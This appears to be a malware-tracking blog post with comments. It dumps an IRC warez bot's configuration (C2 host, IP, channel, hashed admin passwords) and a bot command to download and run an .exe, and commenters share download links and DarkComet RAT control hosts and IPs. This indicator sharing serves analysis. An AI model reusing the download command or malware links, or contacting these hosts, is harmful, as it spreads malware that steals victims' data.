Mirc xdcc bots
Resolved : [kca.zapto.org] To [173.167.76.199]
[ADMINCHAN] channel=#KCA3 admin-enable=$true [nick] prenick=WarezDivx [passwords] owner=d9b820a195766546549a0e9a7fb8728d admin=d9b820a195766546549a0e9a7fb8728d filler=d9b820a195766546549a0e9a7fb8728d [message] header-enable=$true footer-enable=$true header=..::[ 1WaReZ R00tZ 2009 ]::.. footer=..::[ 1WaReZ R00tZ 2009 ]::.. [options] needvoice=off [xserver] nspass= status=on sent=2310 packs=0 [xdcc] reqmeth=msg enable-queues=$true enable-autoadd=$false sends=10 queues=20 sends-user=1 queues-user=2 message=$true time=30 [show] queues=$true slots=$true record=$true bandwidth=$true total=$true [channels] 1=#KCA3 [hosts] 1=WarezRo*!*romania@*.* 2=WarezRo*!*xp@*.* 3= *!*@*4= *!*@warezro.ro 5= *!*@zaneti.users.undernet.org [record] recbw=0 [servers] 1=kca.zapto.org 2=kca.zapto.org 3=kca.zapto.org 4=kca.zapto.org
Channel:
#KCA3
Sample here: !dl hxxp://www.motovarese.com/c.exe
hosting infos:
http://whois.domaintools.com/173.167.76.199
Anonymous - August 30, 2012 at 7:30 am
Hello Pig, take a look at this file that someone was spreading on 4chan.
People were claiming it was stealing there Information and credit card details.
File: http://www.mediafire.com/?cat1hbm3ku3z9t1
Thread: http://archive.rebeccablacktech.com/g/thread/S27107417
Thread: https://archive.foolz.us/v/thread/152325664/
I_Post_Ur_Info - September 1, 2012 at 2:08 am
lostboy.exe ajensen.no-ip.biz 62.255.190.148:742
DNS is already suspended.
The other malware posted on /v/ at around the same time.
darkcometremover.exe skiddlemcdiddle.zapto.org 81.154.152.173:100
Both were the darkcomet rat.
The link you posted was the real game. The fake link was http://www.mediafire.com/?metne41jinbc8kn